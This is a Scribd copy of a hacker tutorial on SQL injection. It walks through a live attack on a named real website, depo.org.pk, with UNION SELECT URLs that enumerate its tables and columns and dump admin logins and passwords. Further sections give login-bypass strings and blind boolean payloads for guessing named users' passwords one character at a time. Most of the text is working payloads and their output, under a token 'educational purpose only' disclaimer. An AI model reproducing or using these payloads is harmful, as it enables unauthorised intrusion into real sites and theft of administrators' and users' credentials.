Scribd
Upload
46 views

How To Use SQL Injection 1

This document provides instructions on how to perform SQL injection attacks to exploit vulnerabilities on websites. It describes how to: 1) Test a website for SQL injection vulnerabilities by inserting malicious SQL code into vulnerable form fields. 2) Determine the number of columns in a database table by incrementally adding columns to SQL queries. 3) Use functions like database(), version(), and load_file() to extract information about the database. 4) Query the information_schema tables to identify database and table names, as well as column names and contents. 5) Demonstrates how to extract usernames and passwords by injecting SQL queries through vulnerable login forms.

Uploaded by

sanj083
Copyright
© Attribution Non-Commercial (BY-NC)
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
46 views

How To Use SQL Injection 1

This document provides instructions on how to perform SQL injection attacks to exploit vulnerabilities on websites. It describes how to: 1) Test a website for SQL injection vulnerabilities by inserting malicious SQL code into vulnerable form fields. 2) Determine the number of columns in a database table by incrementally adding columns to SQL queries. 3) Use functions like database(), version(), and load_file() to extract information about the database. 4) Query the information_schema tables to identify database and table names, as well as column names and contents. 5) Demonstrates how to extract usernames and passwords by injecting SQL queries through vulnerable login forms.

Uploaded by

sanj083
Copyright
© Attribution Non-Commercial (BY-NC)
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
You are on page 1/ 7

How to use SQL Injection?

Best Online Tutorial for SQL Injection

Thanks to Inxroot & aa_numb from Indishell for this valuable piece of cake.

[NOTE: This is for educational purpose only.]

This is practical tutorial...! as long as this .pk site is up !

So lets start.. Hers is the website on which this live testing was done: http://www.depo.org.pk

Try to Find variables passing to inner script...

http://www.depo.org.pk/index.php?a=newsdetail&id=1

Where &id= is variable passing values to sql

Check whether it is vulnerable or Not... Put ' in place of 1 as shoen below

depo.org.pk/index.php?a=newsdetail&id='

If it shows error ! Then we can apply sqli on this URL. Now we need to determine numbers of
columns in current table.

Increase numbers un-till u get rid of 'The used SELECT statements have a different number of
columns

+1
+1,2
+1,2,3
+1,2.3,4
+1,2,3,4,5
+1,2,3,4,5,6
+1,2,3,4,5,6,7
+1,2,3,4,5,6,7,8... ! Order to find columns... !

http://www.depo.org.pk/index.php?a=newsdetail&id=-1+union+select+1
http://www.depo.org.pk/index.php?a=newsdetail&id=-1+union+select+1,2
http://www.depo.org.pk/index.php?a=newsdetail&id=-1+union+select+1,2,3
http://www.depo.org.pk/index.php?a=newsdetail&id=-1+union+select+1,2,3,4
http://www.depo.org.pk/index.php?a=newsdetail&id=-1+union+select+1,2,3,4,5
http://www.depo.org.pk/index.php?a=newsdetail&id=-1+union+select+1,2,3,4,5,6
http://www.depo.org.pk/index.php?a=newsdetail&id=-1+union+select+1,2,3,4,5,6,7
http://www.depo.org.pk/index.php?a=newsdetail&id=-1+union+select+1,2,3,4,5,6,7,8

BINGGOOOOOOOOOO....!!! here we no error.


Here, we used SQL Functions directly from browser.

http://www.depo.org.pk/index.php?a=newsdetail&id=-
1+union+select+1,database(),version(),4,5,6,7,8

database:- depo
version:- 5.0.45-log

------------------------------------------------

Several useful functions (http://dev.mysql.com/doc/refman/5.0/en/functions.html)

user()
database()
version()
current_user()
load_file()
hex()
unhex()
char()
concat()
group_concat()

------------------------------------------------

Now, we need to know structure of victim's mysql database

NOTE: SQL stores each column and table information in another table called as
'information_schema'

Attach SQL Query '+from+information_schema.tables+where+table_schem a=database()' @ the


ending of column numbers !

http://www.depo.org.pk/index.php?a=newsdetail&id=-
1+union+select+1,2,3,4,5,6,7,8+from+information_schema.tables
+where+table_
schema=database()

Now, we want to fatch table structure of database named as 'depo' !

http://www.depo.org.pk/index.php?a=newsdetail&id=-
1+union+select+1,group_concat(table_name),3,4,5,6,7,8+from
+information_schema.tables+where+table_schema=database()

Table names
admin,feedback,ideas,inquiry,members_detail_page,
members_detail_page_pictures,news,newsletter,
org_prod_categories,organizations,orginquiry,pages,
product_categories,products,products_pictures,profile

Now, its turn of column !

http://www.depo.org.pk/index.php?a=newsdetail&id=-
1+union+select+1,group_concat(column_name),3,4,5,6,7,8
+from+information_schema.columns+where+table_schema=database()

Column names

id,login,password,id,name,
company,email,country,learnsite,
visits,content,graphics,loading,organization,
comments,date,id,fname,lname,nic,occupation,
designation,organization,address,
country,city,state,zip,phone,fax,email,website,
date,id,country,agency,telephone,fax,email,website,
demand,company,address,date,id,heading_one,
text_one,heading_two

Heeeeeeeeyaaaaaaaaaa, Its time to fetch Id and password from Table Admin !

http://www.depo.org.pk/index.php?a=newsdetail&id=-1+union+select+1,group_concat
%28login,0x3a,password%29,3,4,5,6,7,8
+from+admin

How to Identify a Site Vulnerable to an SQL Injection Attack

 If a web page accepts text entry (for example a user name and password) then try entering
a string that contains one single quote.
 A vulnerable site may behave oddly given this input. You may see an error message such
as that shown

 n:
By-Pass authentication using SQL Injection

Take a guess

 Before hacking the system, try to guess a user name and password. Unless you are very
lucky you will not get into the system.To know more about PASSWORD GUESSING,
CLICK HERE

Force an Error

 If you enter a string with a single quote in it such as O'Brien for either user name or
password you will get a Software Error as the SQL is invalid and cannot be parsed.

Force Entry

 If you enter the string ' OR ''=' as both user name and password you can ensure that the
WHERE clause always returns true. Without knowing any user names or passwords you
can by-pass the log in screen. In this example you get the user name of the first person in
the table.

The magic string works because it program evaluates:

SELECT name from users WHERE name='name' AND password='password'

as the 'always true' string:

SELECT name from users WHERE name='' OR ''='' AND password='' OR ''=''
Find Table Names using SQL Injection.

In which we discover the names of the tables available for viewing. The function DATABASE()
will give you that value. When you know the name of the database being used you can take
guesses at the names of the tables.

Does the current database contain the letter j?

' OR EXISTS(SELECT 1 FROM dual WHERE database() LIKE '%j%') AND ''='

Is there a table called one in database test?

' OR EXISTS(SELECT * FROM INFORMATION_SCHEMA.TABLES WHERE


TABLE_SCHEMA='test' AND TABLE_NAME='one') AND ''='

Is there more than one table in the database(s) containing a j?

' OR (SELECT COUNT(*) FROM INFORMATION_SCHEMA.TABLES WHERE


TABLE_SCHEMA LIKE '%j%')>1 AND ''='
The below is the list of PTU students username and passwords.

Find a user names using SQL Injection:

You can only ask yes/no questions, but you can find out just about anything you want to with a
little patience.

You use xx for the user name and enter the following as password:

Are there more than 10 rows in the password table?


' OR (SELECT COUNT(*) FROM users)>10 AND ''='

Is there a user with an r in his name?


' OR EXISTS(SELECT * FROM users WHERE name LIKE '%r%') AND ''='

Is there a user (other than ajaypal) with an a in his name?


' OR EXISTS(SELECT * FROM users WHERE name!='ajaypal' AND name LIKE '%a
%') AND ''='

Find the below example, You can find other users on the system. We choose to get mandeep's
password in the below string.

' OR EXISTS(SELECT * FROM users WHERE name='mandeep' AND password LIKE


'%w%') AND ''='

Find a password. How to discover the password for a user if you know the name of the
password table and a user account.

You can now get the system to answer questions about the password table. It will only ever
answer yes (and let you in) or no (by refusing entry). Your questions must take the form of a
valid SQL query. In each case use a xx for the user name and the text shown as password. You
can ask questions such as:

Does jake's password have a w in it?


' OR EXISTS(SELECT * FROM users WHERE name='jake' AND password LIKE '%w
%') AND ''='

Does jake's password start with w?


' OR EXISTS(SELECT * FROM users WHERE name='jake' AND password LIKE 'w%')
AND ''='

Does jake's password have an w followed by d?


' OR EXISTS(SELECT * FROM users WHERE name='jake' AND password LIKE '%w
%d%') AND ''='

Is the fourth letter of jake's password w?


' OR EXISTS(SELECT * FROM users WHERE name='jake' AND password LIKE '___w
%') AND ''='

This works because the LIKE command uses % and _ as wildcards. The % wildcard matches any
string, the _ wildcard matches a single character.

You might also like